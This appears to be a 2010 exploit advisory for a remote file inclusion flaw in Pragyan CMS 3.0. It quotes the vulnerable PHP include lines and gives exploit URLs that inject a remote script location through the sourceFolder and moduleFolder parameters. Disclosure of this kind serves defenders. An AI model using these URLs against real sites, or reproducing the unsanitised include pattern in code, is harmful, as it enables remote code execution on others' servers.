Pragyan CMS 3.0 Remote File Inclusion Vulnerability

2010-10-22 / 2010-10-23
Credit: Cru3l.b0y
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

[+] Exploit Title: Pragyan CMS 3.0 Remote File Inclusion Vulnerability [+] Date: 2010-10-21 [+] Author : Cru3l.b0y [+] Software Link: http://switch.dl.sourceforge.net/project/pragyan/pragyan/3.0/pragyanv3.0-alpha.tar.bz2 [+] Version: 3.0 [+] Tested on: Ubuntu 10.10 [+] Contact : Cru3l.b0y@gmail.com [+] Website : WwW.PenTesters.IR [+] Greeting: Behzad, Ahmad, Arash, Kose Ameye Baghie [+] register_globals = On +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ [+] Vul Code [1]: "/cms/modules/form.lib.php" 37 global $sourceFolder; 38 global $moduleFolder; 39 require_once("$sourceFolder/$moduleFolder/form/editform.php"); 40 require_once("$sourceFolder/$moduleFolder/form/editformelement.php"); 41 require_once("$sourceFolder/$moduleFolder/form/registrationformgenerate.php"); 42 require_once("$sourceFolder/$moduleFolder/form/registrationformsubmit.php"); 43 require_once("$sourceFolder/$moduleFolder/form/viewregistrants.php"); [+] Exploit [1]: http://target/path/cms/modules/form.lib.php?sourceFolder=script +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ [+] Vul Code [2]: "/cms/modules/search/search.php" 31 $searchModuleFolder = "$sourceFolder/$moduleFolder/search"; 32 $include_dir = "$searchModuleFolder/include"; 33 include ("$include_dir/commonfuncs.php"); [+] Exploit [2]: http://target/path/cms/modules/search/search.php?moduleFolder=script http://target//path/cms/modules/search/search.php?sourceFolder=script


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top